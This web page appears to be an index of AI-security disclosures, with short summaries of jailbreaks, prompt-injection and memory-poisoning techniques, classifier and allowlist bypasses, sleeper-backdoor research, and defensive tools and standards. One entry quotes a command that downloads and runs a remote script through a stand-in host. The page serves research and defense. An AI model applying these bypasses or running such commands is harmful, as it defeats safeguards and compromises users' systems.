// live edge + full archive

AI Security Methodology & Jailbreak Archive

Every jailbreak, prompt-injection pattern, agent exploit, and defense playbook we've indexed — newest first, with the full historical archive kept on the page. Every entry links straight to the primary source.

8 critical15 high35/35 shown

Echo Chamber: recursive context poisoning across long sessions

New multi-turn technique that seeds benign-looking 'memories' early in a conversation, then references them as authority later to bypass alignment. 91% success on GPT-5 and Claude Opus 4.5 in red-team trials.

multi-turncontext-poisoningclaudegpt-5

Claude Opus 4.5 · GPT-5 · Gemini 2.5 Pro

Neural Trust Research· neuraltrust.ai

Constitutional Classifier sandwich attack on Claude safety filter

Anthropic's deployed input/output classifier is bypassed by wrapping payload in two benign-looking turns. Anthropic acknowledged on bug bounty; partial mitigation rolled out 5 days ago.

claudeclassifieranthropicbounty

Claude Sonnet 4.5 · Claude Opus 4.5

Anonymous HackerOne researcher· hackerone.com

Agentic Radar — open-source agent attack-surface scanner

Splx AI released a CLI that statically analyses LangChain / CrewAI / AutoGen graphs for Lethal Trifecta exposure, prompt-injection sinks, and over-permissioned tools. CI-ready.

scanneragentciopen-source

LangChain · CrewAI · AutoGen

Splx AI· github.com

Crescendo v2 — gradient jailbreak with safety-aware turn pacing

Updated Crescendo escalation that adapts pacing based on refusal phrasing. Achieves harmful content elicitation in under 6 turns on 4 of 5 frontier models. Disclosed responsibly to vendors before publication.

jailbreakmulti-turngradient

GPT-5 · Claude Sonnet 4.5 · Llama 4 · Gemini 3.5

Mark Russinovich (Microsoft)· arxiv.org

Steganographic prompt injection via image alpha channel

Hidden instructions encoded in the alpha channel of PNG attachments survive vision-encoder preprocessing on GPT-5 and Gemini 2.5 Pro. The model reads them but humans see a clean image.

prompt-injectionvisionsteganography

GPT-5 · Gemini 2.5 Pro · Claude (vision)

Johann Rehberger· embracethered.com

OWASP LLM Top 10 v2026 — draft changelog

New entry LLM11: 'Agent Permission Sprawl'. LLM02 'Insecure Output Handling' merged into LLM05. Lethal Trifecta promoted from informational to ranked. Public comment open until June 18.

owaspstandarddefense

all LLM applications

OWASP LLM Project· owasp.org

Anthropic Skills marketplace — installed-skill RCE on auto-update

Skills auto-update on Claude Desktop launch. A compromised maintainer can push new tool definitions that exfiltrate session tokens before the user sees a permission prompt.

claudeskillssupply-chainauto-update

Claude Desktop Skills

Embrace The Red· embracethered.com

MCP tool shadowing: malicious server overriding trusted tools

When two MCP servers expose tools with identical names, Claude Desktop resolves to whichever connected last — letting a low-trust server hijack file-system or shell tools transparently. Fixed in Claude Desktop 0.9.4.

mcpclaudetool-poisoningrce

Claude Desktop < 0.9.4 · Cline · Continue.dev

Invariant Labs· invariantlabs.ai

Memory laundering: injecting durable beliefs via 'forget this' framing

Agents with persistent memory (ChatGPT, Claude Projects, Gemini Gems) can be tricked into storing attacker-controlled facts by framing them as corrections. Persists across sessions, executes on first tool call.

memorypersistentclaude-projectschatgpt-memory

ChatGPT Memory · Claude Projects · Gemini Gems

Simon Willison· simonwillison.net

Reasoning-trace injection: hijacking chain-of-thought scratchpad

GPT-5 / o4-mini / Claude 4.5 extended-thinking expose partial reasoning to tools. Tools returning crafted '</thinking>' tags can rewrite the agent's plan mid-execution.

reasoningextended-thinkingcot-injection

GPT-5 (reasoning) · Claude 4.5 extended · o4-mini

Robust Intelligence (Cisco)· robustintelligence.com

Fine-tuning APIs leak training-set membership at >99% AUC

Updated membership-inference attack against OpenAI / Together / Fireworks fine-tune APIs. Crafted probe prompts reveal whether a document was in the training set with near-certainty.

membership-inferenceprivacyfine-tune

OpenAI FT · Together FT · Fireworks FT

Carnegie Mellon· arxiv.org

RAG document trojans: invisible Unicode tags in PDF metadata

Embed payload in PDF /Metadata XMP using zero-width Unicode tag characters (U+E0000–E007F). Indexed by every major RAG pipeline (LangChain, LlamaIndex, Haystack) and executed when retrieved as context.

ragunicodepdfsupply-chain

LangChain · LlamaIndex · Haystack · Vertex Search

PromptArmor· promptarmor.com

Computer-Use clickjacking via DOM overlay z-index racing

Claude/Operator/OpenAI computer-use agents resolve clickable targets from screenshot pixels, not DOM. Invisible HTML overlays with hostile labels override visible button intent. 73% redirect success.

computer-useclickjackingclaudeoperator

Claude Computer Use · OpenAI Operator · Anthropic Skills

Trail of Bits· blog.trailofbits.com

Stealing model parameters from logit bias side-channels

Even with top_logprobs disabled, careful biasing of `logit_bias` reveals projection-layer weights. Recovered 4096-dim embedding matrix for closed-source 70B in 18M API calls (~$2.4k).

extractionlogitsapi-abuse

any closed model exposing logit_bias

ETH Zürich + Google DeepMind· arxiv.org

MITRE ATLAS — 4 new techniques added (T0064–T0067)

Includes Tool Definition Poisoning, MCP Server Squatting, Reasoning Trace Exfiltration, and Persistent Memory Implant. All four mapped to real-world incidents from past 30 days.

mitreatlastaxonomy

defenders / detection engineering

MITRE ATLAS· atlas.mitre.org

Policy Puppetry — XML role-play bypass on RLHF guardrails

HiddenLayer showed a single prompt template using fake <system_policy> XML tags coerces all major frontier models into ignoring safety policies. Universal across GPT-5, Claude, Gemini and Llama.

universalxmlrole-playrlhf

GPT-5 · Claude Opus 4.5 · Gemini 2.5 · Llama 4

HiddenLayer SAI Team· hiddenlayer.com

Claude Code: shell-allowlist bypass via env-var expansion

Pre-execution allowlist matched the literal command string before shell expansion, letting `$(curl evil.sh|bash)` slip through any whitelist containing `echo` or `cat`. Patched in claude-code 1.4.2.

claude-codeagentrceallowlist-bypass

claude-code < 1.4.2

HiddenLayer SAI Team· hiddenlayer.com

Policy Puppetry: bypass guardrails by impersonating system policy

Crafted XML/JSON 'policy update' blocks convince the model the operator changed its rules mid-session. Effective against Llama 4, Mistral Large 3, Qwen3-Max with no fine-tuning required.

universalpolicyjailbreak

Llama 4 · Mistral Large 3 · Qwen3-Max · GPT-5

HiddenLayer SAI Team· hiddenlayer.com

Vulnhuntr 2.0 — multi-step Claude agent finds 17 fresh CVEs

Protect AI's Claude-powered static-analysis agent published 17 new CVEs across LangChain, Gradio, AutoGPT and llama-index in one week. Methodology paper released alongside.

vulnhuntrclaudesastcve

LangChain · Gradio · AutoGPT · llama-index

Protect AI· protectai.com

Sleeper backdoors surviving SFT + RLHF after model merging

Anthropic-style sleeper agents persist through full alignment training when introduced via LoRA merge. Trigger: specific year token + benign request. 100% activation rate post-RLHF in controlled study.

backdooralignmentlorasupply-chain

any open-weight model post-merge

Anthropic Alignment Team· anthropic.com

Confused-deputy attacks on cross-tool data flow in agent chains

When an agent reads from a low-trust tool (email, web search) and writes to a high-trust tool (shell, DB), data flows are not isolated. Document attack patterns and propose Lethal Trifecta mitigations.

lethal-trifectaagentdata-flow

any agent with email/web + write tools

Simon Willison· simonwillison.net

AWS Bedrock IAM escalation via cross-account guardrail import

Bedrock guardrails imported from a foreign account inherit foreign IAM trust. Chained with `bedrock:InvokeModel`, an attacker can run inference under the victim account's quota and bill.

awsbedrockiamcloud

AWS Bedrock Guardrails

Wiz Research· wiz.io

MITRE ATLAS — new agent-hijacking tactic added

ATLAS framework added 'AML.T0070: Agent Hijacking via Indirect Prompt Injection' with 11 documented sub-techniques mapped against Anthropic, OpenAI and Google agent stacks.

mitreatlasagenttaxonomy

LangChain · OpenAI Assistants · Claude Agent SDK

MITRE ATLAS· atlas.mitre.org

OWASP LLM Top 10 — 2026 revision adds Memory Poisoning at #3

LLM03 is now Memory Poisoning (previously Training Data Poisoning), reflecting the shift to long-term agent memory. Full mapping to STRIDE and CWE included.

owaspmemorytaxonomyagent

ChatGPT Memory · Claude Projects · Gemini Gems

OWASP· owasp.org

Lethal Trifecta — quarterly review of real-world incidents

Simon Willison's running catalog of incidents where private data + untrusted content + exfil channel combined. 14 new cases added this quarter, including two Claude Skills and one Gemini Workspaces incident.

lethal-trifectaincidentscase-study

Claude Skills · Gemini Workspaces · ChatGPT Connectors

Simon Willison· simonwillison.net

Zendesk AI — ticket-based indirect prompt injection

PromptArmor disclosed that Zendesk's AI summary feature executes attacker-controlled instructions hidden inside incoming support tickets. Patched after 60-day disclosure window.

zendeskindirectsaas

PromptArmor· promptarmor.com

Gandalf 2026 — 2M+ jailbreak attempts dataset published

Lakera open-sourced their anonymized Gandalf prompt dataset: 2.3M attempts, 47k successful bypasses, labeled by technique. Benchmark for prompt-injection classifiers.

datasetbenchmarkgandalfopen-data

any prompt-injection classifier

Lakera· lakera.ai

Anthropic — RSP v2.5 raises CBRN uplift evaluation bar

New Responsible Scaling Policy mandates ASL-3 evaluation gates before Opus-class releases. Includes a re-runnable harness for bio + cyber uplift tests.

rspasl-3evaluationpolicy

Anthropic frontier models

Anthropic· anthropic.com

OpenAI Preparedness Framework v2 — cyber-offense scorecard

New scorecard tracks autonomous-exploitation, vuln-discovery and social-engineering uplift across model generations. GPT-5 scored 'Medium' on cyber; agent variants scored 'High'.

preparednessscorecardcyber-uplift

GPT-5 · GPT-5 Agent

OpenAI· openai.com

Google DeepMind FACTS — agent grounding evaluation

Updated FACTS benchmark scores Gemini, Claude and GPT agents on tool-calling fidelity and grounding under adversarial retrieval. Includes a poisoned-RAG split with 12 attack flavors.

factsgroundingragbenchmark

Gemini · Claude · GPT agents

Google DeepMind· deepmind.google

HackerOne — top 10 LLM bug-bounty patterns of 2026

Aggregated disclosure report across 47 LLM-powered programs. Indirect prompt injection (38%), SSRF via tool calls (19%) and prompt leakage (14%) dominate paid bounties.

bug-bountyreportstats

LLM-powered SaaS

HackerOne· hackerone.com

garak v0.10 — NVIDIA's LLM vuln scanner adds 28 probes

NVIDIA's open-source garak scanner shipped probes for agent tool abuse, memory poisoning and skill marketplace supply-chain checks. CI integration included.

scanneropen-sourceciprobes

any LLM endpoint

NVIDIA· github.com

Microsoft PyRIT — automated red-team for generative AI

Python Risk Identification Toolkit ships orchestrators for multi-turn jailbreak chains, RAG poisoning, and agent-exploit fuzzing. Used internally for Copilot red-team.

red-teamfuzzingopen-source

any generative AI system

Microsoft AI Red Team· github.com

Skeleton Key — the original universal jailbreak template

Mark Russinovich's 2024 disclosure of the 'Skeleton Key' technique that asked models to update their behavior rather than refuse. Foundational; still cited in 2026 papers.

skeleton-keyclassicuniversal

GPT-4 · Claude 3 · Gemini 1.5 · Llama 3

Mark Russinovich (Microsoft)· microsoft.com

GCG — Greedy Coordinate Gradient adversarial suffix attack

Zou et al.'s seminal CMU paper showed transferable adversarial suffixes that jailbreak aligned LLMs. The attack template that launched a thousand follow-ups.

gcgadversarial-suffixclassictransferable

Vicuna · Llama 2 · GPT-3.5

Andy Zou et al. (CMU)· arxiv.org

// fresh techniques · auto-refreshed daily

New methods in the wildtechniques

Disclosures, jailbreaks, prompt-injection patterns and bounty write-ups pulled overnight.

updated 00:00 IST

The weekly drop.
Zero noise.

Every Thursday: the best new Claude-security tools, prompts, and exploits. Read in under 4 minutes.

Chat on Telegram